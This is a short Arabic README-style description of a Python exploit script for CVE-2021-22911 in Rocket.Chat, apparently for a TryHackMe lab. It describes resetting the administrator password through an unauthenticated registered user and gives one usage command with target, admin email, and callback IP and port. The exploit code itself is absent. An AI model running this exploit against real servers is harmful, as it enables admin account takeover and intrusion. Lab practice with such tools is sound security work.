
سكريبت استغلال بلغة Python لثغرة CVE-2021-22911 يستهدف إعادة تعيين كلمة مرور المسؤول في Rocket.Chat عبر تسجيل مستخدم غير مصادق. يقوم بأتمتة عملية الاستغلال مع إمكانية تكوين الهدف واسم مستخدم المسؤول وعنوان IP للاتصال الراجع.
إذا كنت قد سجلت مستخدمًا بالفعل، فسيؤدي ذلك إلى إعادة تعيين كلمة مرور المسؤول فقط، وليس كليهما. مما يجعل الاستغلال يعمل بشكل أسرع بكثير.
python3 exploit.py -u test -a [email protected] -t http://chat.rocket.thm -i 10.10.4.24 -p 80